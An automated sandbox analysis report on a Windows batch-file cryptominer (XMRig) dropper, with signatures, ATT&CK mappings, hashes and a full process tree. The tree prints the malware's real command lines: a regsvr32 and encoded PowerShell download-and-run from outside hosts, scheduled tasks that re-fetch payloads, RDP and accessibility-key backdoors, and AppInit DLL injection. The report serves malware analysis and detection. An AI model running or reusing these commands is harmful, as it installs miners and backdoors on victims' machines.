xmrig | 30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1

Resubmissions

16-10-2021 08:50

211016-krydjscfbj 10

16-10-2021 06:51

211016-hmx6wabgb9 10

Analysis

max time kernel
123s
max time network
137s
platform
windows10_x64
resource
win10-en-20210920
submitted
16-10-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

222.bat
Size

89B
MD5

75a4daa4b7e656ded55a6a7865342d04
SHA1

8e52d1f4dfa6bd9501ba89855b44059bf92f699e
SHA256

30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1
SHA512

16fafec07a8ebed3d602c6af50323a2c8e0f784f4d8ccd172d78d935cb7e8a2294a51c02999a04e53efdaf290a5de687cb7654d67f38590eee392431bd7c2334

Score

10^/10

xmrig evasion miner persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cat.xiaoshabi.nl/networks.ps1

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Network\Connections\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
C:\ProgramData\Microsoft\Network\Connections\services.exe	xmrig

Blocklisted process makes network request 13 IoCs

Processes:

powershell.exe

flow	pid	process
10	952	powershell.exe
27	952	powershell.exe
27	952	powershell.exe
29	952	powershell.exe
30	952	powershell.exe
31	952	powershell.exe
33	952	powershell.exe
34	952	powershell.exe
35	952	powershell.exe
38	952	powershell.exe
39	952	powershell.exe
40	952	powershell.exe
41	952	powershell.exe

Executes dropped EXE 11 IoCs

Processes:

mon.exemin.exeuas.exeSetACL.exeSetACL.exeSetACL.execohernece.exeservices.exeservices.exeservices.exeservices.exe

pid	process
3632	mon.exe
3120	min.exe
584	uas.exe
3792	SetACL.exe
920	SetACL.exe
4016	SetACL.exe
4040	cohernece.exe
2668	services.exe
3156	services.exe
2184	services.exe
3476	services.exe

Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx

Loads dropped DLL 7 IoCs

Processes:

svchost.exeservices.exeservices.exeservices.exeservices.exe

pid process

1512 svchost.exe
2668 services.exe
3156 services.exe
3188
2184 services.exe
1508
3476 services.exe
Drops file in System32 directory 1 IoCs

Processes:

cohernece.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll cohernece.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

784 schtasks.exe
2712 schtasks.exe
3312 schtasks.exe
1484 schtasks.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

2176 NETSTAT.EXE
2184 NETSTAT.EXE
Modifies data under HKEY_USERS 1 IoCs

Processes:

services.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache services.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3572 reg.exe

pid	process
1512	svchost.exe
2668	services.exe
3156	services.exe
3188
2184	services.exe
1508
3476	services.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll	cohernece.exe

pid	process
784	schtasks.exe
2712	schtasks.exe
3312	schtasks.exe
1484	schtasks.exe

pid	process
2176	NETSTAT.EXE
2184	NETSTAT.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	services.exe

pid	process
3572	reg.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exeservices.exeservices.exeservices.exeservices.exe

pid	process
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
952	powershell.exe
2668	services.exe
2668	services.exe
2668	services.exe
2668	services.exe
2668	services.exe
2668	services.exe
3156	services.exe
3156	services.exe
3156	services.exe
3156	services.exe
2184	services.exe
2184	services.exe
2184	services.exe
2184	services.exe
2184	services.exe
2184	services.exe
3476	services.exe
3476	services.exe
2184	services.exe
2184	services.exe
2184	services.exe
2184	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exeNETSTAT.EXE

description	pid	process
Token: SeDebugPrivilege	952	powershell.exe
Token: SeIncreaseQuotaPrivilege	952	powershell.exe
Token: SeSecurityPrivilege	952	powershell.exe
Token: SeTakeOwnershipPrivilege	952	powershell.exe
Token: SeLoadDriverPrivilege	952	powershell.exe
Token: SeSystemProfilePrivilege	952	powershell.exe
Token: SeSystemtimePrivilege	952	powershell.exe
Token: SeProfSingleProcessPrivilege	952	powershell.exe
Token: SeIncBasePriorityPrivilege	952	powershell.exe
Token: SeCreatePagefilePrivilege	952	powershell.exe
Token: SeBackupPrivilege	952	powershell.exe
Token: SeRestorePrivilege	952	powershell.exe
Token: SeShutdownPrivilege	952	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeSystemEnvironmentPrivilege	952	powershell.exe
Token: SeRemoteShutdownPrivilege	952	powershell.exe
Token: SeUndockPrivilege	952	powershell.exe
Token: SeManageVolumePrivilege	952	powershell.exe
Token: 33	952	powershell.exe
Token: 34	952	powershell.exe
Token: 35	952	powershell.exe
Token: 36	952	powershell.exe
Token: SeIncreaseQuotaPrivilege	952	powershell.exe
Token: SeSecurityPrivilege	952	powershell.exe
Token: SeTakeOwnershipPrivilege	952	powershell.exe
Token: SeLoadDriverPrivilege	952	powershell.exe
Token: SeSystemProfilePrivilege	952	powershell.exe
Token: SeSystemtimePrivilege	952	powershell.exe
Token: SeProfSingleProcessPrivilege	952	powershell.exe
Token: SeIncBasePriorityPrivilege	952	powershell.exe
Token: SeCreatePagefilePrivilege	952	powershell.exe
Token: SeBackupPrivilege	952	powershell.exe
Token: SeRestorePrivilege	952	powershell.exe
Token: SeShutdownPrivilege	952	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeSystemEnvironmentPrivilege	952	powershell.exe
Token: SeRemoteShutdownPrivilege	952	powershell.exe
Token: SeUndockPrivilege	952	powershell.exe
Token: SeManageVolumePrivilege	952	powershell.exe
Token: 33	952	powershell.exe
Token: 34	952	powershell.exe
Token: 35	952	powershell.exe
Token: 36	952	powershell.exe
Token: SeShutdownPrivilege	3732	powercfg.exe
Token: SeCreatePagefilePrivilege	3732	powercfg.exe
Token: SeShutdownPrivilege	2132	powercfg.exe
Token: SeCreatePagefilePrivilege	2132	powercfg.exe
Token: SeShutdownPrivilege	3564	powercfg.exe
Token: SeCreatePagefilePrivilege	3564	powercfg.exe
Token: SeDebugPrivilege	2176	NETSTAT.EXE
Token: SeIncreaseQuotaPrivilege	952	powershell.exe
Token: SeSecurityPrivilege	952	powershell.exe
Token: SeTakeOwnershipPrivilege	952	powershell.exe
Token: SeLoadDriverPrivilege	952	powershell.exe
Token: SeSystemProfilePrivilege	952	powershell.exe
Token: SeSystemtimePrivilege	952	powershell.exe
Token: SeProfSingleProcessPrivilege	952	powershell.exe
Token: SeIncBasePriorityPrivilege	952	powershell.exe
Token: SeCreatePagefilePrivilege	952	powershell.exe
Token: SeBackupPrivilege	952	powershell.exe
Token: SeRestorePrivilege	952	powershell.exe
Token: SeShutdownPrivilege	952	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeSystemEnvironmentPrivilege	952	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeregsvr32.execmd.exepowershell.execsc.exeuas.exe

description	pid	process	target process
PID 2112 wrote to memory of 3540	2112	cmd.exe	regsvr32.exe
PID 2112 wrote to memory of 3540	2112	cmd.exe	regsvr32.exe
PID 3540 wrote to memory of 1348	3540	regsvr32.exe	cmd.exe
PID 3540 wrote to memory of 1348	3540	regsvr32.exe	cmd.exe
PID 1348 wrote to memory of 952	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 952	1348	cmd.exe	powershell.exe
PID 952 wrote to memory of 60	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 60	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1220	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1220	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1384	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1384	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 400	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 400	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1804	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1804	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 3600	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 3600	952	powershell.exe	netsh.exe
PID 952 wrote to memory of 1484	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 1484	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 784	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 784	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 2712	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 2712	952	powershell.exe	schtasks.exe
PID 952 wrote to memory of 3732	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 3732	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 2132	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 2132	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 3564	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 3564	952	powershell.exe	powercfg.exe
PID 952 wrote to memory of 2176	952	powershell.exe	NETSTAT.EXE
PID 952 wrote to memory of 2176	952	powershell.exe	NETSTAT.EXE
PID 952 wrote to memory of 1380	952	powershell.exe	csc.exe
PID 952 wrote to memory of 1380	952	powershell.exe	csc.exe
PID 1380 wrote to memory of 1576	1380	csc.exe	cvtres.exe
PID 1380 wrote to memory of 1576	1380	csc.exe	cvtres.exe
PID 952 wrote to memory of 2184	952	powershell.exe	NETSTAT.EXE
PID 952 wrote to memory of 2184	952	powershell.exe	NETSTAT.EXE
PID 952 wrote to memory of 1968	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 1968	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 2192	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 2192	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 784	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 784	952	powershell.exe	findstr.exe
PID 952 wrote to memory of 1172	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 1172	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 1004	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 1004	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 3632	952	powershell.exe	mon.exe
PID 952 wrote to memory of 3632	952	powershell.exe	mon.exe
PID 952 wrote to memory of 3632	952	powershell.exe	mon.exe
PID 952 wrote to memory of 2308	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 2308	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 3120	952	powershell.exe	min.exe
PID 952 wrote to memory of 3120	952	powershell.exe	min.exe
PID 952 wrote to memory of 3120	952	powershell.exe	min.exe
PID 952 wrote to memory of 1952	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 1952	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 3504	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 3504	952	powershell.exe	attrib.exe
PID 952 wrote to memory of 584	952	powershell.exe	uas.exe
PID 952 wrote to memory of 584	952	powershell.exe	uas.exe
PID 952 wrote to memory of 584	952	powershell.exe	uas.exe
PID 584 wrote to memory of 2020	584	uas.exe	cmd.exe

Views/modifies file attributes 1 TTPs 7 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2308 attrib.exe
1952 attrib.exe
3504 attrib.exe
4072 attrib.exe
3684 attrib.exe
1172 attrib.exe
1004 attrib.exe

pid	process
2308	attrib.exe
1952	attrib.exe
3504	attrib.exe
4072	attrib.exe
3684	attrib.exe
1172	attrib.exe
1004	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\222.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
3⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add policy name=netbc
5⤵
PID:60

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filterlist name=block
5⤵
PID:1220

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filteraction name=block action=block
5⤵
PID:1384

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
5⤵
PID:400

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
5⤵
PID:1804

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static set policy name=netbc assign=y
5⤵
PID:3600

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\MUI\LMRemove /tr "regsvr32 /u /s /i:http://cat.dashabi.in/networks.xsl scrobj.dll" /sc onstart /ru System /F
5⤵
- Creates scheduled task(s)
PID:1484

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\Multimedia\SystemEventService /tr "regsvr32 /u /s /i:http://cat.xiaojiji.nl/networks.xsl scrobj.dll" /sc minute /mo 720 /ru System /F
5⤵
- Creates scheduled task(s)
PID:784

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\PLA\System\NPzIUtarf /tr "regsvr32 /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll" /sc minute /mo 420 /ru System /F
5⤵
- Creates scheduled task(s)
PID:2712

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pbwcixbg\pbwcixbg.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8597.tmp" "c:\Users\Admin\AppData\Local\Temp\pbwcixbg\CSC8D462D99604F47FC8217FA22EC8784A.TMP"
6⤵
PID:1576

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
PID:2184

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight "c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe"
5⤵
PID:1968

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\explorer.exe
5⤵
PID:2192

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe
5⤵
PID:784

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Downloader\services.exe
5⤵
- Views/modifies file attributes
PID:1172

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
5⤵
- Views/modifies file attributes
PID:1004

C:\Users\Admin\AppData\Local\Temp\mon.exe
"C:\Users\Admin\AppData\Local\Temp\mon.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:3632

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\services.exe
5⤵
- Views/modifies file attributes
PID:2308

C:\Users\Admin\AppData\Local\Temp\min.exe
"C:\Users\Admin\AppData\Local\Temp\min.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:3120

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Views/modifies file attributes
PID:1952

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
5⤵
- Views/modifies file attributes
PID:3504

C:\Users\Admin\AppData\Local\Temp\uas.exe
"C:\Users\Admin\AppData\Local\Temp\uas.exe" -pSwifcks
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Windows\1.bat" "
6⤵
PID:2020

C:\Windows\SysWOW64\sc.exe
sc stop ias
7⤵
PID:3732

C:\Windows\SysWOW64\sc.exe
sc delete ias
7⤵
PID:3136

C:\Windows\SysWOW64\sc.exe
sc stop FastUserSwitchingCompatibility
7⤵
PID:3116

C:\Windows\SysWOW64\sc.exe
sc delete FastUserSwitchingCompatibility
7⤵
PID:2652

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn setowner -ownr "n:Administrators"
7⤵
- Executes dropped EXE
PID:3792

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:full"
7⤵
- Executes dropped EXE
PID:920

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" /v StartExe /t REG_EXPAND_SZ /d "C:\ProgramData\Microsoft\Windows\WER\cmd.exe" /f /reg:64
7⤵
PID:2168

C:\ProgramData\Microsoft\Windows\SetACL.exe
SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:read"
7⤵
- Executes dropped EXE
PID:4016

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
7⤵
PID:2260

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
7⤵
- Modifies registry key
PID:3572

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +a +r C:\ProgramData\Microsoft\Windows\WER\cmd.exe
7⤵
- Views/modifies file attributes
PID:4072

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\WER\cmd.exe
5⤵
- Views/modifies file attributes
PID:3684

C:\Users\Admin\AppData\Local\Temp\cohernece.exe
"C:\Users\Admin\AppData\Local\Temp\cohernece.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4040

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f /reg:64
5⤵
PID:4028

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f /reg:64
5⤵
PID:3876

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d C:\\ProgramData\\Microsoft\\Windows\\Caches\\SecureAssessmentHandlerstor.dll /f /reg:64
5⤵
PID:3012

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:4068

C:\ProgramData\Microsoft\Network\Downloader\services.exe
"C:\ProgramData\Microsoft\Network\Downloader\services.exe" install "Event Logs" c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2668

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:2224

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\RAC\RacTaskMgr /tr "wmic os get /format:'http://cat.xiaoshabi.nl:80/net/net.xsl'" /sc minute /mo 500 /ru System /F
5⤵
- Creates scheduled task(s)
PID:3312

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3328

\??\c:\windows\syswow64\svchost.exe
c:\windows\syswow64\svchost.exe -k netsvcs -s FastUserSwitchingCompatibility
1⤵
- Loads dropped DLL
PID:1512

C:\ProgramData\Microsoft\Network\Downloader\services.exe
C:\ProgramData\Microsoft\Network\Downloader\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3156

\??\c:\ProgramData\Microsoft\Network\services.exe
"c:\ProgramData\Microsoft\Network\services.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2184

\??\c:\ProgramData\Microsoft\Network\Connections\services.exe
c:\ProgramData\Microsoft\Network\Connections\services.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3476

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
548f5058ff8f4fdb514ba0592cdcf344

SHA1
08abe2336a8e6031cfa72bb04607836c8f2edac6

SHA256
796b34e03468bf448fb6c77386d41ba789ec80871fe18dacaa59a3031b579822

SHA512
62af61d1f0197e3fa8cbfb33cf5b791fc010220e5d11b9ba6471d214e32fdc4d8340fa5fd25910537cc69a96bf8e6d851a1a717eef3be618b2cf0fe2fa3a4f1a

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
548f5058ff8f4fdb514ba0592cdcf344

SHA1
08abe2336a8e6031cfa72bb04607836c8f2edac6

SHA256
796b34e03468bf448fb6c77386d41ba789ec80871fe18dacaa59a3031b579822

SHA512
62af61d1f0197e3fa8cbfb33cf5b791fc010220e5d11b9ba6471d214e32fdc4d8340fa5fd25910537cc69a96bf8e6d851a1a717eef3be618b2cf0fe2fa3a4f1a

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
